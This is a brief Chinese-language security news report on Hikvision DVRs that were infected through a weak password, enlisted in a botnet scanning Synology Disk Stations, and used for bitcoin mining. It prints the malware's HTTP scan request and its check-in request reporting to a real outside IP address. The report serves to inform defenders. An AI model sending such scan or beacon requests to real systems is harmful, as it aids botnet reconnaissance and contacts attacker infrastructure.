上周安全人员通过一份报告得知，海康威视(Hikvision)的数字录像机(DVR)扫描了他们设立的蜜罐，这些数字录像机原本是用于储存安全探头的视频，但由于弱密码（12345）而被感染了病毒，变成了僵尸网络的一部分。其被用于扫描存在漏洞的台湾群晖磁盘站（Synology Disk Stations）。此外，数字录像机还被安装了比特币挖矿程序。

值得注意的是，录像机感染的病毒是ARM二进制程序，显然病毒是专门针对ARM设备而不是x86 Linux服务器。

恶意病毒发出的HTTP请求

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

然后病毒会传送版本信息至162.219.57.8

GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close

原文信息